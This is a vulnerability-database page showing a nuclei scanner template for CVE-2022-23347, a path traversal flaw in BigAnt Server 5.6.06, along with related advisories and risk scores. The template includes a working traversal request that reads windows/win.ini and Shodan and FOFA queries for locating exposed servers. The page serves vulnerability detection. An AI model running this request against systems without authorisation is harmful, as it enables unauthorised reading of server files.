Lucene search
K

BigAnt Server v5.6.06 - Local File Inclusion

🗓️ 03 Jul 2026 03:01:05Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 33 Views

BigAnt Server v5.6.06 - Local File Inclusion vulnerabilit

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-23347
21 Mar 202220:15
attackerkb
Circl
CVE-2022-23347
21 Mar 202223:26
circl
CNNVD
Big Ant Studios BigAnt Software BigAnt Server 路径遍历漏洞
21 Mar 202200:00
cnnvd
CNVD
BigAnt Software BigAnt Server Directory Traversal Vulnerability
23 Mar 202200:00
cnvd
CVE
CVE-2022-23347
21 Mar 202219:23
cve
Cvelist
CVE-2022-23347
21 Mar 202219:23
cvelist
NVD
CVE-2022-23347
21 Mar 202220:15
nvd
OSV
CVE-2022-23347
21 Mar 202220:15
osv
Prion
Directory traversal
21 Mar 202220:15
prion
RedhatCVE
CVE-2022-23347
9 Jan 202610:55
redhatcve
Rows per page
id: CVE-2022-23347

info:
  name: BigAnt Server v5.6.06 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: BigAnt Server v5.6.06 is vulnerable to local file inclusion.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the server.
  remediation: |
    Apply the latest patch or update provided by the vendor to fix the LFI vulnerability in BigAnt Server v5.6.06.
  reference:
    - https://github.com/bzyo/cve-pocs/tree/master/CVE-2022-23347
    - https://nvd.nist.gov/vuln/detail/CVE-2022-23347
    - http://bigant.com
    - https://www.bigantsoft.com/
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-23347
    cwe-id: CWE-22
    epss-score: 0.13121
    epss-percentile: 0.95884
    cpe: cpe:2.3:a:bigantsoft:bigant_server:5.6.06:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: bigantsoft
    product: bigant_server
    shodan-query:
      - http.html:"BigAnt"
      - http.html:"bigant"
    fofa-query: body="bigant"
  tags: cve,cve2022,bigant,lfi,bigantsoft,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php/Pan/ShareUrl/downloadSharedFile?true_path=../../../../../../windows/win.ini&file_name=win.ini"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b310676dc6a7f45d409f14f8ac00e6103c3b63c99fc1ad4ec496ba3cfaef610002207db27612a8a15282599577f71b3d15086de7a2476d8e69d6b0e353002c626091:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7High risk
Vulners AI Score7
CVSS 25
CVSS 3.17.5
EPSS0.13121
33